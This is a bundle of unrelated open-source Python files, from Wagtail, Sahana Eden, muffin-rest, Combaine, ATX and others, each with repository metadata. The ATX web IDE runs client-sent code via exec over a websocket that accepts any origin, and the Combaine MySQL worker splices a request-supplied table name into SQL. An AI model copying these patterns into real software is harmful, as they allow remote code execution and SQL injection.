AddTransportCondition = 'BIKA: Add Transport condition'
AddStorageCondition = 'BIKA: Add Storage condition'
# Add Permissions for specific types, if required
ADD_CONTENT_PERMISSIONS = {
'Country': AddCountry,
'Region': AddRegion,
'Cultivar': AddCultivar,
'WineType': AddWineType,
'TransportCondition': AddTransportCondition,
'StorageCondition': AddStorageCondition,
}
|
bikalabs/bika.wine
|
bika/wine/permissions.py
|
Python
|
agpl-3.0
| 669 | 0 |
from django.core.exceptions import PermissionDenied
from django.shortcuts import get_object_or_404
from wagtail.wagtailcore.models import Page, PageViewRestriction
from wagtail.wagtailadmin.forms import PageViewRestrictionForm
from wagtail.wagtailadmin.modal_workflow import render_modal_workflow
def set_privacy(request, page_id):
page = get_object_or_404(Page, id=page_id)
page_perms = page.permissions_for_user(request.user)
if not page_perms.can_set_view_restrictions():
raise PermissionDenied
# fetch restriction records in depth order so that ancestors appear first
restrictions = page.get_view_restrictions().order_by('page__depth')
if restrictions:
restriction = restrictions[0]
restriction_exists_on_ancestor = (restriction.page != page)
else:
restriction = None
restriction_exists_on_ancestor = False
if request.POST:
form = PageViewRestrictionForm(request.POST)
if form.is_valid() and not restriction_exists_on_ancestor:
if form.cleaned_data['restriction_type'] == 'none':
# remove any existing restriction
if restriction:
restriction.delete()
else: # restriction_type = 'password'
if restriction:
restriction.password = form.cleaned_data['password']
restriction.save()
else:
# create a new restriction object
PageViewRestriction.objects.create(
page=page, password=form.cleaned_data['password'])
return render_modal_workflow(
request, None, 'wagtailadmin/page_privacy/set_privacy_done.js', {
'is_public': (form.cleaned_data['restriction_type'] == 'none')
}
)
else: # request is a GET
if not restriction_exists_on_ancestor:
if restriction:
form = PageViewRestrictionForm(initial={
'restriction_type': 'password', 'password': restriction.password
})
else:
# no current view restrictions on this page
form = PageViewRestrictionForm(initial={
'restriction_type': 'none'
})
if restriction_exists_on_ancestor:
# display a message indicating that there is a restriction at ancestor level -
# do not provide the form for setting up new restrictions
return render_modal_workflow(
request, 'wagtailadmin/page_privacy/ancestor_privacy.html', None,
{
'page_with_restriction': restriction.page,
}
)
else:
# no restriction set at ancestor level - can set restrictions here
return render_modal_workflow(
request,
'wagtailadmin/page_privacy/set_privacy.html',
'wagtailadmin/page_privacy/set_privacy.js', {
'page': page,
'form': form,
}
)
|
mephizzle/wagtail
|
wagtail/wagtailadmin/views/page_privacy.py
|
Python
|
bsd-3-clause
| 3,072 | 0.001302 |
#!/usr/bin/python
#======================================================================
#
# Project : hpp_IOStressTest
# File : IOST_WMain_CTRL.py
# Date : Oct 20, 2016
# Author : HuuHoang Nguyen
# Contact : hhnguyen@apm.com
# : hoangnh.hpp@gmail.com
# License : MIT License
# Copyright : 2016
# Description: The hpp_IOStressTest is under the MIT License, a copy of license which may be found in LICENSE
#
#======================================================================
import io
import os
import sys
import time
from IOST_Prepare import IOST_Prepare
from IOST_Config import *
from IOST_WRun import *
import gtk
import gtk.glade
class IOST_WMain_CTRL():
"""
"""
def __init__(self, glade_filename, object, builder=None):
"""
"""
if not builder:
self.IOST_CTRL_Builder = gtk.Builder()
self.IOST_CTRL_Builder.add_from_file(glade_filename)
self.IOST_CTRL_Builder.connect_signals(self)
else:
self.IOST_CTRL_Builder = builder
def GetCTRL_Obj(self, object_name):
"""
Get all CTRL objects on WMain window
"""
self.ConfigObjs[object_name]["SaveConfig_B_Obj"] = self.IOST_CTRL_Builder.get_object(self.ConfigObjs[object_name]["SaveConfig_B_Name"])
self.ConfigObjs[object_name]["Cancel_B_Obj"] = self.IOST_CTRL_Builder.get_object(self.ConfigObjs[object_name]["Cancel_B_Name"])
self.ConfigObjs[object_name]["Run_B_Obj"] = self.IOST_CTRL_Builder.get_object(self.ConfigObjs[object_name]["Run_B_Obj"])
#----------------------------------------------------------------------
# Run Button
#----------------------------------------------------------------------
def on_IOST_Wmain_Config_Save_B_clicked(self, object, data=None):
"Control to Save Condfig button"
# --------------------
# Cancel Button
# --------------------
def on_IOST_Wmain_Config_CTRL_Cancel_B_clicked(self, object, data=None):
"Control to Cancel button"
#----------------------------------------------------------------------
def on_IOST_Wmain_Config_CTRL_Run_B_clicked(self, object, data=None):
"Control to Run button"
IOST_WRun.__init__(self, self.IOST_WMain_GladeFile,
self.ConfigObjs["IOST_WRun"]["WRun_Name"],
None)
self.ConfigObjs["IOST_WMain"]["WMain_Obj"].hide()
#
|
HPPTECH/hpp_IOSTressTest
|
Refer/IOST_OLD_SRC/IOST_0.10/IOST_WMain_CTRL.py
|
Python
|
mit
| 2,475 | 0.006061 |
"""Support for Peewee ORM (https://github.com/coleifer/peewee)."""
from __future__ import annotations
import typing as t
import marshmallow as ma
import muffin
import peewee as pw
from apispec.ext.marshmallow import MarshmallowPlugin
from marshmallow_peewee import ForeignKey, ModelSchema
from muffin.typing import JSONType
from peewee_aio import Manager, Model
from muffin_rest.errors import APIError
from muffin_rest.handler import RESTBase, RESTOptions
from muffin_rest.peewee.filters import PWFilters
from muffin_rest.peewee.openapi import PeeweeOpenAPIMixin
from muffin_rest.peewee.sorting import PWSorting
# XXX: Patch apispec.MarshmallowPlugin to support ForeignKeyField
MarshmallowPlugin.Converter.field_mapping[ForeignKey] = ("integer", None)
class PWRESTOptions(RESTOptions):
"""Support Peewee."""
model: t.Type[pw.Model]
model_pk: t.Optional[pw.Field] = None
manager: Manager
# Base filters class
filters_cls: t.Type[PWFilters] = PWFilters
# Base sorting class
sorting_cls: t.Type[PWSorting] = PWSorting
Schema: t.Type[ModelSchema]
# Schema auto generation params
schema_base: t.Type[ModelSchema] = ModelSchema
# Recursive delete
delete_recursive = False
base_property: str = "model"
def setup(self, cls):
"""Prepare meta options."""
self.name = self.name or self.model._meta.table_name.lower()
self.model_pk = self.model_pk or self.model._meta.primary_key
manager = getattr(self, "manager", getattr(self.model, "_manager", None))
if manager is None:
raise RuntimeError("Peewee-AIO ORM Manager is not available")
self.manager = manager
super().setup(cls)
def setup_schema_meta(self, _):
"""Prepare a schema."""
return type(
"Meta",
(object,),
dict(
{"unknown": self.schema_unknown, "model": self.model},
**self.schema_meta,
),
)
class PWRESTBase(RESTBase):
"""Support Peeweee."""
collection: pw.Query
resource: pw.Model
meta: PWRESTOptions
meta_class: t.Type[PWRESTOptions] = PWRESTOptions
async def prepare_collection(self, _: muffin.Request) -> pw.Query:
"""Initialize Peeewee QuerySet for a binded to the resource model."""
return self.meta.model.select()
async def prepare_resource(self, request: muffin.Request) -> t.Optional[pw.Model]:
"""Load a resource."""
pk = request["path_params"].get(self.meta.name_id)
if not pk:
return None
meta = self.meta
resource = await meta.manager.fetchone(
self.collection.where(meta.model_pk == pk)
)
if resource is None:
raise APIError.NOT_FOUND("Resource not found")
return resource
async def paginate(
self, _: muffin.Request, *, limit: int = 0, offset: int = 0
) -> t.Tuple[pw.Query, int]:
"""Paginate the collection."""
cqs: pw.Select = self.collection.order_by() # type: ignore
if cqs._group_by:
cqs._returning = cqs._group_by
count = await self.meta.manager.count(cqs)
return self.collection.offset(offset).limit(limit), count # type: ignore
async def get(self, request, *, resource=None) -> JSONType:
"""Get resource or collection of resources."""
if resource is not None and resource != "":
return await self.dump(request, resource, many=False)
resources = await self.meta.manager.fetchall(self.collection)
return await self.dump(request, resources, many=True)
async def save(self, _: muffin.Request, resource: pw.Model) -> pw.Model:
"""Save the given resource."""
meta = self.meta
if issubclass(meta.model, Model):
await resource.save()
else:
await meta.manager.save(resource)
return resource
async def remove(self, request: muffin.Request, *, resource: pw.Model = None):
"""Remove the given resource."""
meta = self.meta
if resource:
resources = [resource]
else:
data = await request.data()
if not data:
return
model_pk = t.cast(pw.Field, meta.model_pk)
resources = await meta.manager.fetchall(
self.collection.where(model_pk << data)
)
if not resources:
raise APIError.NOT_FOUND()
delete_instance = meta.manager.delete_instance
if issubclass(meta.model, Model):
delete_instance = lambda m: m.delete_instance(recursive=meta.delete_recursive) # type: ignore # noqa
for res in resources:
await delete_instance(res)
delete = remove # noqa
async def get_schema(
self, request: muffin.Request, resource=None, **_
) -> ma.Schema:
"""Initialize marshmallow schema for serialization/deserialization."""
return self.meta.Schema(
instance=resource,
only=request.url.query.get("schema_only"),
exclude=request.url.query.get("schema_exclude", ()),
)
class PWRESTHandler(PWRESTBase, PeeweeOpenAPIMixin): # type: ignore
"""Support peewee."""
pass
|
klen/muffin-rest
|
muffin_rest/peewee/__init__.py
|
Python
|
mit
| 5,302 | 0.000943 |
"""
Chaotic series
"""
from plotting import plot_iteration
from generic_iteration import generic_iteration
class Iterator:
"""Iterator object to compute iterative processes or magnitudes.
"""
def __init(self, iter_f, stop_f):
"""Instantiation of the iteration.
Parameters
----------
iter_f: function
the iteration function.
stop_f: function
the conditions to stop the iteration.
"""
self.iter_f, self.stop_f = iter_f, stop_f
def iterate_sequence(self, p0):
"""Comput the iteration from the initial point given.
Parameters
----------
p0: optional
initial point to start the iteration.
Returns
-------
sequence: np.ndarray
the sequence information.
"""
sequence = generic_iteration(p0, self.iter_f, self.stop_f)
return sequence
def plot_sequence(self, sequence):
"""Plot a 1d sequence.
Parameters
----------
sequence: np.ndarray
the sequence information.
Returns
-------
fig: matplotlib.pyplot.figure
the figure object which contains the plot.
"""
fig = plot_iteration(sequence)
return fig
|
tgquintela/ChaosFunctions
|
ChaosFunctions/chaotic_series.py
|
Python
|
mit
| 1,312 | 0 |
# encoding: utf-8
__import__('pkg_resources').declare_namespace(__name__)
|
NicoVarg99/daf-recipes
|
ckan/ckan/ckan/ckanext/stats/__init__.py
|
Python
|
gpl-3.0
| 75 | 0 |
# -*- coding: utf-8 -*-
from gluon import *
from s3 import *
from s3layouts import *
try:
from .layouts import *
except ImportError:
pass
import s3menus as default
# =============================================================================
class S3MainMenu(default.S3MainMenu):
"""
Custom Main Menu
"""
# -------------------------------------------------------------------------
@classmethod
def menu(cls):
main_menu = MM()(
# Modules-menu, align-left
cls.menu_modules(),
# Service menus, align-right
# Note: always define right-hand items in reverse order!
cls.menu_lang(right=True),
#cls.menu_gis(right=True),
cls.menu_auth(right=True),
cls.menu_admin(right=True),
cls.menu_help(right=True),
)
return main_menu
# -------------------------------------------------------------------------
@classmethod
def menu_modules(cls):
""" Custom Modules Menu """
person_id = current.auth.s3_logged_in_person()
if person_id:
dashboard = MM("Dashboard", c="pr", f="person",
args=[person_id, "dashboard"])
else:
dashboard = None
return [dashboard,
MM("Map", c="gis", f="index"),
MM("Incidents", c="event", f="incident", m="browse"),
MM("Events", c="event", f="event", m="browse"),
MM("Resources", c="pr", f="group", m="browse"),
MM("Groups", c="pr", f="forum", m="browse"),
MM("More", link=False)(
MM("Fire Stations", c="fire", f="station"),
MM("Police Stations", c="police", f="station"),
),
]
# -------------------------------------------------------------------------
@classmethod
def menu_help(cls, **attr):
""" Custom Help Menu """
menu_help = MM("About", f="about", **attr)
return menu_help
# -------------------------------------------------------------------------
@classmethod
def menu_auth(cls, **attr):
""" Auth Menu """
auth = current.auth
logged_in = auth.is_logged_in()
if not logged_in:
request = current.request
login_next = URL(args=request.args, vars=request.vars)
if request.controller == "default" and \
request.function == "user" and \
"_next" in request.get_vars:
login_next = request.get_vars["_next"]
self_registration = current.deployment_settings.get_security_registration_visible()
if self_registration == "index":
register = MM("Register", c="default", f="index", m="register",
vars=dict(_next=login_next),
check=self_registration)
else:
register = MM("Register", m="register",
vars=dict(_next=login_next),
check=self_registration)
menu_auth = MM("Login", c="default", f="user", m="login",
_id="auth_menu_login",
vars=dict(_next=login_next), **attr)(
MM("Login", m="login",
vars=dict(_next=login_next)),
register,
MM("Lost Password", m="retrieve_password")
)
else:
# Logged-in
menu_auth = MM(auth.user.email, c="default", f="user",
translate=False, link=False, _id="auth_menu_email",
**attr)(
MM("User Profile", m="profile"),
#MM("Personal Data", c="default", f="person", m="update"),
#MM("Contact Details", c="pr", f="person",
# args="contact",
# vars={"person.pe_id" : auth.user.pe_id}),
#MM("Subscriptions", c="pr", f="person",
# args="pe_subscription",
# vars={"person.pe_id" : auth.user.pe_id}),
MM("Change Password", m="change_password"),
MM("Logout", m="logout", _id="auth_menu_logout"),
#SEP(),
#MM({"name": current.T("Rapid Data Entry"),
# "id": "rapid_toggle",
# "value": current.session.s3.rapid_data_entry is True},
# f="rapid"),
)
return menu_auth
# -------------------------------------------------------------------------
@classmethod
def menu_lang(cls, **attr):
""" Language Selector """
s3 = current.response.s3
menu_lang = ML("Language", **attr)
for language in s3.l10n_languages.items():
code, name = language
menu_lang(
ML(name, translate=False, lang_code=code, lang_name=name)
)
return menu_lang
# =============================================================================
class S3OptionsMenu(default.S3OptionsMenu):
""" Custom Application Side Menu """
# -------------------------------------------------------------------------
def admin(self):
""" ADMIN menu """
ADMIN = current.session.s3.system_roles.ADMIN
settings_messaging = self.settings_messaging()
#translate = current.deployment_settings.has_module("translate")
# NB: Do not specify a controller for the main menu to allow
# re-use of this menu by other controllers
return M(restrict=[ADMIN])(
M("Settings", c="admin", f="setting")(
settings_messaging,
),
M("User Management", c="admin", f="user")(
M("Create User", m="create"),
M("List All Users"),
M("Import Users", m="import"),
M("List All Roles", f="role"),
M("List All Organization Approvers & Whitelists", f="organisation"),
#M("Roles", f="group"),
#M("Membership", f="membership"),
),
M("Database", c="appadmin", f="index")(
M("Raw Database access", c="appadmin", f="index"),
),
M("Error Tickets", c="admin", f="errors"),
M("Synchronization", c="sync", f="index")(
M("Settings", f="config", args=[1], m="update"),
M("Repositories", f="repository"),
M("Log", f="log"),
),
M("Taxonomies")(
#M("Event Types", c="event", f="event_type"),
M("Incident Types", c="event", f="incident_type"),
M("Organization Types", c="org", f="organisation_type"),
M("Update Statuses", c="cms", f="status"),
),
#M("Edit Application", a="admin", c="default", f="design",
#args=[request.application]),
#M("Translation", c="admin", f="translate", check=translate)(
# M("Select Modules for translation", c="admin", f="translate",
# m="create", vars=dict(opt="1")),
# M("Upload translated files", c="admin", f="translate",
# m="create", vars=dict(opt="2")),
# M("View Translation Percentage", c="admin", f="translate",
# m="create", vars=dict(opt="3")),
# M("Add strings manually", c="admin", f="translate",
# m="create", vars=dict(opt="4"))
#),
#M("View Test Result Reports", c="admin", f="result"),
#M("Portable App", c="admin", f="portable")
)
# END =========================================================================
|
flavour/eden
|
modules/templates/historic/WACOP/menus.py
|
Python
|
mit
| 8,445 | 0.003671 |
#!/usr/bin/env python
import os
import random
import types
import uuid
import msgpack
import MySQLdb
#from MySQLdb.cursors import DictCursor
#from MySQLdb.cursors import Cursor
from warnings import filterwarnings
from cocaine.worker import Worker
from cocaine.logging import Logger
#Suppressing warnings
filterwarnings('ignore', category=MySQLdb.Warning)
log = Logger()
class MySqlDG(object):
def __init__(self, **config):
self.logger = Logger()
self.place = None
self.tablename = ''
try:
# port = config.get('local_db_port', 3306)
unix_socket = config.get('MysqlSocket',
"/var/run/mysqld/mysqld.sock")
self.dbname = config.get('local_db_name', 'COMBAINE')
self.db = MySQLdb.connect(unix_socket=unix_socket, user='root', )
self.cursor = self.db.cursor()
self.cursor.execute('CREATE DATABASE IF NOT EXISTS %s' % self.dbname)
self.db.commit()
self.db.select_db(self.dbname)
except Exception as err:
self.logger.error('Error in init MySQLdb %s' % err)
raise Exception
def putData(self, data, tablename):
try:
tablename = tablename.replace('.', '_').replace('-', '_').replace('+', '_')
line = None
fname = '/dev/shm/%s-%i' % ('COMBAINE', random.randint(0, 65535))
with open(fname, 'w') as table_file:
for line in data:
table_file.write('GOPA'.join([str(x) for x in line.values()]) + '\n')
table_file.close()
if not line:
self.logger.info("Data for mysql is missed")
os.remove(table_file.name)
return False
self.logger.debug('Data written to a temporary file %s, size: %d bytes'
% (table_file.name, os.lstat(table_file.name).st_size))
if not self._preparePlace(line):
self.logger.error('Unsupported field types. Look at preparePlace()')
return False
self.cursor.execute('DROP TABLE IF EXISTS %s' % tablename)
query = "CREATE TABLE IF NOT EXISTS %(tablename)s %(struct)s ENGINE = MEMORY DATA DIRECTORY='/dev/shm/'" % {'tablename': tablename,
'struct': self.place}
self.cursor.execute(query)
self.db.commit()
query = "LOAD DATA INFILE '%(filename)s' INTO TABLE %(tablename)s FIELDS TERMINATED BY 'GOPA'" % {'filename': table_file.name,
'tablename': tablename}
self.cursor.execute(query)
self.db.commit()
if os.path.isfile(table_file.name):
os.remove(table_file.name)
except Exception as err:
self.logger.error('Error in putData %s' % err)
if os.path.isfile(table_file.name):
os.remove(table_file.name)
return False
else:
self.tablename = tablename
return True
def _preparePlace(self, example):
ftypes = {types.IntType: "INT",
types.UnicodeType: "VARCHAR(200)",
types.StringType: "VARCHAR(200)",
types.FloatType: "FLOAT"}
try:
self.place = '( %s )' % ','.join([" %s %s" % (field_name,
ftypes[type(field_type)])
for field_name, field_type in example.items()])
except Exception as err:
self.logger.error('Error in preparePlace() %s' % err)
self.place = None
return False
else:
return True
def perfomCustomQuery(self, query_string):
self.logger.debug("Execute query: %s" % query_string)
self.cursor.execute(query_string)
_ret = self.cursor.fetchall()
self.db.commit()
return _ret
def __del__(self):
if self.db:
self.cursor.close()
self.db.commit()
self.db.close()
def put(request, response):
raw = yield request.read()
config, data = msgpack.unpackb(raw)
tablename = str(uuid.uuid4()).replace("-", "")[:24]
log.info(str(config))
log.info("Put data into %s" % tablename)
try:
m = MySqlDG(**config)
m.putData(data, tablename)
except Exception as err:
response.error(-100, str(err))
else:
response.write(tablename)
response.close()
def drop(request, response):
raw = yield request.read()
config, tablename = msgpack.unpackb(raw)
try:
m = MySqlDG(**config)
drop_query = "DROP TABLE IF EXISTS %s" % tablename
log.info(drop_query)
m.perfomCustomQuery(drop_query)
except Exception as err:
response.error(-100, str(err))
else:
response.write("ok")
response.close()
if __name__ == "__main__":
W = Worker()
W.run({"put": put,
"drop": drop})
|
kartvep/Combaine
|
plugins/datagrid/mysqldg.py
|
Python
|
lgpl-3.0
| 5,281 | 0.00303 |
#!/usr/bin/python
# encoding: utf-8
# -*- coding: utf8 -*-
from gevent import monkey
monkey.patch_all()
hosts = [
'https://api.weixin.qq.com/cgi-bin/get_current_selfmenu_info', # 公众平台接口通用域名
'https://qyapi.weixin.qq.com/cgi-bin/menu/get', # 企业号域名
'https://login.weixin.qq.com/', # 微信网页版
'https://wx2.qq.com/', # 微信网页版
'http://weixin.qq.com/' # 微信首页
]
def request_http(url):
print('GET: %s' % url)
import requests
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/51.0.2704.106 Safari/537.36",
'cache-control': "no-cache",
}
response = requests.request("GET", url, headers=headers)
print len(response.text), "retrieved from %s " % url
gevent.sleep(0.5)
print response.headers, "from %s " % url
if __name__ == '__main__':
import gevent
gevent.joinall([gevent.spawn(request_http, host) for host in hosts])
|
WZQ1397/automatic-repo
|
python/checkWeixinApi.py
|
Python
|
lgpl-3.0
| 1,022 | 0.002075 |
# -*- coding: utf-8 -*-
"""
{{ cookiecutter.app_name }}.api.v1
{{ "~" * (cookiecutter.app_name ~ ".api.v1")|count }}
:author: {{ cookiecutter.author }}
:copyright: © {{ cookiecutter.copyright }}
:license: {{ cookiecutter.license }}, see LICENSE for more details.
templated from https://github.com/ryanolson/cookiecutter-webapp
"""
from .todos import TodosAPI, TodosResource, TodoResource
def create_blueprint(name=None, url_prefix=None, subdomain=None):
"""Register API endpoints on a Flask :class:`Blueprint`."""
from flask import Blueprint
# Determine blueprint name
name = name or __name__.split('.')[-1]
url_prefix = url_prefix or "/{0}".format(name)
if subdomain:
name = "{0}_{1}".format(subdomain, name)
# Create blueprint
bp = Blueprint(name, __name__, url_prefix=url_prefix, subdomain=subdomain)
# Register API endpoints
TodosAPI.register(bp)
return bp
|
ryanolson/cookiecutter-webapp
|
{{cookiecutter.app_name}}/{{cookiecutter.app_name}}/api/v1/__init__.py
|
Python
|
mit
| 946 | 0.001058 |
# coding: utf-8
import os
import sys
import logging
import webbrowser
import socket
import time
import json
import traceback
import cv2
import tornado.ioloop
import tornado.web
import tornado.websocket
from tornado.concurrent import run_on_executor
from concurrent.futures import ThreadPoolExecutor # `pip install futures` for python2
import atx
from atx import logutils
from atx import imutils
from atx import base
__dir__ = os.path.dirname(os.path.abspath(__file__))
log = logutils.getLogger("webide", level=logging.DEBUG)
log.setLevel(logging.DEBUG)
IMAGE_PATH = ['.', 'imgs', 'images']
workdir = '.'
device = None
atx_settings = {}
def read_file(filename, default=''):
if not os.path.isfile(filename):
return default
with open(filename, 'rb') as f:
return f.read()
def write_file(filename, content):
with open(filename, 'w') as f:
f.write(content.encode('utf-8'))
def get_valid_port():
for port in range(10010, 10100):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('127.0.0.1', port))
sock.close()
if result != 0:
return port
raise SystemError("Can not find a unused port, amazing!")
class FakeStdout(object):
def __init__(self, fn=sys.stdout.write):
self._fn = fn
def write(self, s):
self._fn(s)
def flush(self):
pass
class ImageHandler(tornado.web.RequestHandler):
def get(self):
imgs = base.list_images(path=IMAGE_PATH)
images = []
for name in imgs:
realpath = name.replace('\\', '/') # fix for windows
name = os.path.basename(name).split('@')[0]
images.append([name, realpath])
self.write({
'images': images,
'baseURL': self.request.protocol + '://' + self.request.host+'/static_imgs/'
})
class MainHandler(tornado.web.RequestHandler):
def get(self):
imgs = base.list_images(path=IMAGE_PATH)
imgs = [(os.path.basename(name), name) for name in imgs]
self.render('index.html', images=imgs)
def post(self):
print self.get_argument('xml_text')
self.write("Good")
class DebugWebSocket(tornado.websocket.WebSocketHandler):
executor = ThreadPoolExecutor(max_workers=1)
def open(self):
log.info("WebSocket connected")
self._run = False
def _highlight_block(self, id):
self.write_message({'type': 'highlight', 'id': id})
if not self._run:
raise RuntimeError("stopped")
else:
time.sleep(.1)
def write_console(self, s):
self.write_message({'type': 'console', 'output': s})
def run_blockly(self, code):
filename = '__tmp.py'
fake_sysout = FakeStdout(self.write_console)
__sysout = sys.stdout
sys.stdout = fake_sysout # TODOs
self.write_message({'type': 'console', 'output': '# '+time.strftime('%H:%M:%S') + ' start running\n'})
try:
# python code always UTF-8
code = code.encode('utf-8')
# hot patch
code = code.replace('atx.click_image', 'd.click_image')
exec code in {
'highlight_block': self._highlight_block,
'__name__': '__main__',
'__file__': filename}
except RuntimeError as e:
if str(e) != 'stopped':
raise
print 'Program stopped'
except Exception as e:
self.write_message({'type': 'traceback', 'output': traceback.format_exc()})
finally:
self._run = False
self.write_message({'type': 'run', 'status': 'ready'})
sys.stdout = __sysout
@run_on_executor
def background_task(self, code):
self.write_message({'type': 'run', 'status': 'running'})
self.run_blockly(code)
return True
@tornado.gen.coroutine
def on_message(self, message_text):
message = None
try:
message = json.loads(message_text)
except:
print 'Invalid message from browser:', message_text
return
command = message.get('command')
if command == 'refresh':
imgs = base.list_images(path=IMAGE_PATH)
imgs = [dict(
path=name.replace('\\', '/'), name=os.path.basename(name)) for name in imgs]
self.write_message({'type': 'image_list', 'data': list(imgs)})
elif command == 'stop':
self._run = False
self.write_message({'type': 'run', 'notify': '停止中'})
elif command == 'run':
if self._run:
self.write_message({'type': 'run', 'notify': '运行中'})
return
self._run = True
res = yield self.background_task(message.get('code'))
self.write_message({'type': 'run', 'status': 'ready', 'notify': '运行结束', 'result': res})
else:
self.write_message(u"You said: " + message)
def on_close(self):
log.info("WebSocket closed")
def check_origin(self, origin):
return True
class WorkspaceHandler(tornado.web.RequestHandler):
def get(self):
ret = {}
ret['xml_text'] = read_file('blockly.xml', default='<xml xmlns="http://www.w3.org/1999/xhtml"></xml>')
ret['python_text'] = read_file('blockly.py')
self.write(ret)
def post(self):
log.info("Save workspace")
xml_text = self.get_argument('xml_text')
python_text = self.get_argument('python_text')
write_file('blockly.xml', xml_text)
write_file('blockly.py', python_text)
class ScreenshotHandler(tornado.web.RequestHandler):
def get(self):
d = atx.connect(**atx_settings)
d.screenshot('_screen.png')
self.set_header('Content-Type', 'image/png')
with open('_screen.png', 'rb') as f:
while 1:
data = f.read(16000)
if not data:
break
self.write(data)
self.finish()
def post(self):
raw_image = self.get_argument('raw_image')
filename = self.get_argument('filename')
image = imutils.open(raw_image)
cv2.imwrite(filename, image)
self.write({'status': 'ok'})
class StaticFileHandler(tornado.web.StaticFileHandler):
def get(self, path=None, include_body=True):
path = path.encode(base.SYSTEM_ENCODING) # fix for windows
return super(StaticFileHandler, self).get(path, include_body)
def make_app(settings={}):
static_path = os.getcwd()
application = tornado.web.Application([
(r"/", MainHandler),
(r'/ws', DebugWebSocket), # code debug
(r"/workspace", WorkspaceHandler), # save and write workspace
(r"/images/screenshot", ScreenshotHandler),
(r'/api/images', ImageHandler),
(r'/static_imgs/(.*)', StaticFileHandler, {'path': static_path}),
], **settings)
return application
def main(web_port=None, host=None, port=None, open_browser=True, workdir='.'):
application = make_app({
'static_path': os.path.join(__dir__, 'static'),
'template_path': os.path.join(__dir__, 'static'),
'debug': True,
})
if not web_port:
web_port = get_valid_port()
global device
# global workdir
atx_settings['host'] = host
atx_settings['port'] = port
# device = atx.connect(host=kws.get('host'), port=kws.get('port'))
# TODO
# filename = 'blockly.py'
IMAGE_PATH.append('images/blockly')
if open_browser:
url = 'http://127.0.0.1:{}'.format(web_port)
webbrowser.open(url, new=2) # 2: open new tab if possible
application.listen(web_port)
log.info("Server started.")
log.info("Listening port on 127.0.0.1:{}".format(web_port))
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
|
Andy-hpliu/AirtestX
|
atx/cmds/webide.py
|
Python
|
apache-2.0
| 7,985 | 0.002385 |
#!/bin/env dls-python2.6
'''Channel Access Example'''
from __future__ import print_function
# load correct version of catools
import require
from cothread.catools import *
print(caget('SR21C-DI-DCCT-01:SIGNAL'))
|
epicsdeb/cothread
|
examples/simple.py
|
Python
|
gpl-2.0
| 216 | 0 |
from . import check_academic_calendar
from celery.schedules import crontab
from backoffice.celery import app as celery_app
celery_app.conf.beat_schedule.update({
'|Education group| Check academic calendar': {
'task': 'education_group.tasks.check_academic_calendar.run',
'schedule': crontab(minute=0, hour=0, day_of_month='*', month_of_year='*', day_of_week=0)
},
})
|
uclouvain/osis
|
education_group/tasks/__init__.py
|
Python
|
agpl-3.0
| 391 | 0.002558 |
"""
" "
" This file is part of the 20n/act project. "
" 20n/act enables DNA prediction for synthetic biology/bioengineering. "
" Copyright (C) 2017 20n Labs, Inc. "
" "
" Please direct all queries to act@20n.com. "
" "
" This program is free software: you can redistribute it and/or modify "
" it under the terms of the GNU General Public License as published by "
" the Free Software Foundation, either version 3 of the License, or "
" (at your option) any later version. "
" "
" This program is distributed in the hope that it will be useful, "
" but WITHOUT ANY WARRANTY; without even the implied warranty of "
" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the "
" GNU General Public License for more details. "
" "
" You should have received a copy of the GNU General Public License "
" along with this program. If not, see <http://www.gnu.org/licenses/>. "
" "
"""
from __future__ import absolute_import, division, print_function
import netCDF4 as nc4
def load_lcms_trace(filename):
# netCDF4 documentation lives at
# http://unidata.github.io/netcdf4-python/
print("loading %s" % filename)
nc_file = nc4.Dataset(filename, "r", format="NETCDF4")
timepoints = nc_file.variables['scan_acquisition_time']
scan_points_start = nc_file.variables['scan_index']
scan_points_count = nc_file.variables['point_count']
all_mz_values = nc_file.variables['mass_values']
all_intensity_values = nc_file.variables['intensity_values']
results = []
for i in range(timepoints.size):
points_start = scan_points_start[i]
point_count = scan_points_count[i]
points_end = points_start + point_count
mzs = all_mz_values[points_start:points_end]
assert mzs.size == point_count, "mz count mistmatch: %d vs %d" % (point_count, mzs.size)
intensities = all_intensity_values[points_start:points_end]
assert intensities.size == point_count, "intensity count mistmatch: %d vs %d" % (point_count, intensities.size)
spectrum = {
'time': timepoints[i],
'mz': mzs,
'intensity': intensities
}
results.append(spectrum)
return results
|
20n/act
|
reachables/src/main/python/DeepLearningLcmsPeak/netcdf/netcdf_parser.py
|
Python
|
gpl-3.0
| 2,813 | 0.000711 |
#!/usr/bin/env python3
# encoding: utf-8
'''
Other good PDF utils available on Debian/Ubuntu Linux:
pdfshuffler a gui of PyPDF.
pdfgrep search pdf files for a regular expression. For example, "pdfgrep -n scare *.pdf" search a word among pdf files under current directory.
cups-pdf PDF printer for CUPS. It does what SmartPrint does on Windows.
ImageMagick http://www.imagemagick.org/script/index.php. ImageMagick® is a software suite to create, edit, compose, or convert bitmap images.
briss http://sourceforge.net/projects/briss/. This project aims to offer a simple cross-platform application for cropping PDF files. A simple user interface lets you define exactly the crop-region by fitting a rectangle on the visually overlaid pages. Note: Cropping changes page size.
http://ma.juii.net/blog/scale-page-content-of-pdf-files, How to scale the page content of PDF files?
http://stackoverflow.com/questions/6118635/what-is-the-best-pdf-open-source-library-for-java
http://blog.mashape.com/post/66047403916/list-of-50-pdf-generation-manipulation-and
http://www.cyberciti.biz/faq/removing-password-from-pdf-on-linux/, HowTo: Linux Remove a PDF File Password Using Command Line Options
PDF Clown http://www.stefanochizzolini.it/common/contents/projects/clown/samples/PageCoordinatesSample.java, ctm.getScaleX()
iText http://itextpdf.com/product/itext. iText is a Java PDF library that allows you to CREATE, ADAPT, INSPECT and MAINTAIN documents in the Portable Document Format (PDF). It's dual-licensed.
PyPDF2 http://knowah.github.io/PyPDF2/, https://github.com/knowah/PyPDF2. PDF toolkit implemented solely in Python. PyPDF2 does what pdftk does. pdfshuffler is a GUI of PyPDF.
multivalent http://multivalent.sourceforge.net/Tools/index.html. PDF tools written in Java.
[PDFjam Examples]
1. Resize all pages to A5. Note: The scale ratio is derived from the the first page. The other pages don't scale correctly it their size are different from the first one.
$ pdfjam --paper a5paper --outfile ~/tmp/04.pdf 04.pdf
2. Rotate all pages in counter-clockwise 90 degress.
$ pdfjam --angle 90 --landscape --outfile ~/tmp/04.pdf 04.pdf
